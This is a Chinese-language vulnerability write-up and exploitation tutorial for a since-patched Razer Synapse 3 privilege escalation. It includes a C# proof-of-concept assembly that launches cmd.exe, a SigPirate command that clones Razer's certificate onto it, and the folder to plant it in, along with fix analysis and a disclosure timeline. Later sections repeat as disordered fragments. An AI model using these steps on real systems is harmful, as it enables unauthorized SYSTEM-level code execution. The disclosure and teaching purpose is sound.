Razer Synapse 3特权提升漏洞分析与利用教学<\/h1>

漏洞概述<\/h2>
Razer Synapse 3软件存在一个特权提升漏洞，允许低权限用户在系统上获得SYSTEM权限。该漏洞源于Razer Synapse服务加载程序集时的权限验证不足问题。<\/p>

受影响版本<\/h3>

产品版本: Razer Synapse 3(3.3.1128.112711) Windows客户端<\/li>

测试操作系统: Windows 10 1803(x64)<\/li> <\/ul>

漏洞原理分析<\/h2>

1. 服务运行机制<\/h3>
Razer Synapse软件包含一个以"NT AUTHORITY\SYSTEM"权限运行的服务(Razer Synapse Service)，该服务从"C:\ProgramData\Razer"目录加载多个.NET程序集。<\/p>

2. 权限配置问题<\/h3>
"C:\ProgramData\Razer"目录及其子目录\/文件具有弱权限配置，授予任何经过身份验证的用户FullControl权限。<\/p>

3. 程序集加载机制<\/h3>
当Razer Synapse服务启动时，它会递归枚举"C:\ProgramData\Razer"目录中的所有DLL文件并尝试加载它们。<\/p>

4. 签名验证缺陷<\/h3>
服务会检查程序集的证书链是否与Razer.cer中的证书链匹配，但仅使用X509Certificate.CreateFromSignedFile()提取证书链，而不验证程序集签名的实际有效性。<\/p>

5. 程序集执行点<\/h3>
通过实现SimpleInjector项目的IPackage接口，攻击者可以在RegisterServices()方法中插入恶意代码，当服务加载程序集时会执行这些代码。<\/p>

漏洞利用步骤<\/h2>

1. 创建恶意程序集<\/h3>

需要创建一个实现IPackage接口的.NET程序集，并在RegisterServices()方法中添加恶意逻辑。<\/p>

using<\/span> SimpleInjector;
<\/span><\/span>using<\/span> SimpleInjector.Packaging;
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Lol<\/span> : IPackage
<\/span><\/span>{
<\/span><\/span>    public<\/span> void<\/span> RegisterServices(Container container)
<\/span><\/span>    {
<\/span><\/span>        System.Diagnostics.Process.Start("cmd.exe"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 程序集编译要求<\/h3>

需要引用SimpleInjector和SimpleInjector.Packaging程序集<\/li>
编译为x86架构(因为Razer服务是32位的)<\/li>
<\/ul>
3. 伪造证书签名<\/h3>
使用SigPirate等工具从有效的Razer程序集中克隆证书链到恶意程序集上：<\/p>
SigPirate.exe -i "C:\ProgramData\Razer\Synapse3\Service\bin\Razer.Synapse.Services.exe" -t "C:\temp\lol.dll" -o "C:\temp\lol_signed.dll"
<\/code><\/pre>
4. 部署恶意程序集<\/h3>
将伪造签名的恶意程序集放入服务加载路径中，例如：<\/p>
C:\ProgramData\Razer\Synapse3\Service\bin\lol.dll
<\/code><\/pre>
5. 触发漏洞<\/h3>
需要重启系统或重启Razer Synapse服务，使服务加载恶意程序集并执行其中的代码。<\/p>
漏洞修复分析<\/h2>
Razer通过以下方式修复了该漏洞：<\/p>

实现了名为"Security.WinTrust"的新命名空间，包含完整性检查功能<\/li>
在加载程序集前调用WinTrust.VerifyEmbeddedSignature()验证文件签名<\/li>
使用WinVerifyTrust()验证签名的有效性，确保无法通过简单的证书克隆绕过<\/li>
<\/ol>
防御建议<\/h2>
对于用户<\/h3>

及时更新Razer Synapse软件到最新版本<\/li>
<\/ul>
对于开发者<\/h3>

严格控制服务加载目录的权限<\/li>
实现完整的签名验证机制，而不仅仅是证书链检查<\/li>
使用WinVerifyTrust等API进行完整的签名验证<\/li>
限制服务加载程序集的位置和范围<\/li>
<\/ol>
时间线与披露过程<\/h2>

2018-06-05: 漏洞报告提交至Razer的HackerOne计划<\/li>
2018-06-08: Razer确认报告<\/li>
2018-12-16: 直接联系Razer信息安全经理<\/li>
2018-12-25: 提供内部版本进行修复验证<\/li>
2019-01-10: 修复版本向公众发布<\/li>
2019-01-21: 公开披露漏洞详情<\/li>
<\/ul>
总结<\/h2>
该漏洞展示了权限配置不当与签名验证不完整结合可能导致严重特权提升漏洞。攻击者通过伪造程序集签名和实现特定接口，能够在SYSTEM权限下执行任意代码。修复方案强调了完整签名验证的重要性，而不仅仅是证书链匹配检查。<\/p>

Razer Synapse 3特权提升漏洞分析与利用教学<\/h1>

漏洞概述<\/h2> Razer Synapse 3软件存在一个特权提升漏洞，允许低权限用户在系统上获得SYSTEM权限。该漏洞源于Razer Synapse服务加载程序集时的权限验证不足问题。<\/p>

漏洞原理分析<\/h2>

1. 服务运行机制<\/h3> Razer Synapse软件包含一个以"NT AUTHORITY\SYSTEM"权限运行的服务(Razer Synapse Service)，该服务从"C:\ProgramData\Razer"目录加载多个.NET程序集。<\/p>

2. 权限配置问题<\/h3> "C:\ProgramData\Razer"目录及其子目录\/文件具有弱权限配置，授予任何经过身份验证的用户FullControl权限。<\/p>

3. 程序集加载机制<\/h3> 当Razer Synapse服务启动时，它会递归枚举"C:\ProgramData\Razer"目录中的所有DLL文件并尝试加载它们。<\/p>

4. 签名验证缺陷<\/h3> 服务会检查程序集的证书链是否与Razer.cer中的证书链匹配，但仅使用X509Certificate.CreateFromSignedFile()提取证书链，而不验证程序集签名的实际有效性。<\/p>

5. 程序集执行点<\/h3> 通过实现SimpleInjector项目的IPackage接口，攻击者可以在RegisterServices()方法中插入恶意代码，当服务加载程序集时会执行这些代码。<\/p>

漏洞利用步骤<\/h2>

5. 触发漏洞<\/h3> 需要重启系统或重启Razer Synapse服务，使服务加载恶意程序集并执行其中的代码。<\/p>

防御建议<\/h2>

漏洞概述<\/h2>
Razer Synapse 3软件存在一个特权提升漏洞，允许低权限用户在系统上获得SYSTEM权限。该漏洞源于Razer Synapse服务加载程序集时的权限验证不足问题。<\/p>

1. 服务运行机制<\/h3>
Razer Synapse软件包含一个以"NT AUTHORITY\SYSTEM"权限运行的服务(Razer Synapse Service)，该服务从"C:\ProgramData\Razer"目录加载多个.NET程序集。<\/p>

2. 权限配置问题<\/h3>
"C:\ProgramData\Razer"目录及其子目录\/文件具有弱权限配置，授予任何经过身份验证的用户FullControl权限。<\/p>

3. 程序集加载机制<\/h3>
当Razer Synapse服务启动时，它会递归枚举"C:\ProgramData\Razer"目录中的所有DLL文件并尝试加载它们。<\/p>

4. 签名验证缺陷<\/h3>
服务会检查程序集的证书链是否与Razer.cer中的证书链匹配，但仅使用X509Certificate.CreateFromSignedFile()提取证书链，而不验证程序集签名的实际有效性。<\/p>

5. 程序集执行点<\/h3>
通过实现SimpleInjector项目的IPackage接口，攻击者可以在RegisterServices()方法中插入恶意代码，当服务加载程序集时会执行这些代码。<\/p>

5. 触发漏洞<\/h3>
需要重启系统或重启Razer Synapse服务，使服务加载恶意程序集并执行其中的代码。<\/p>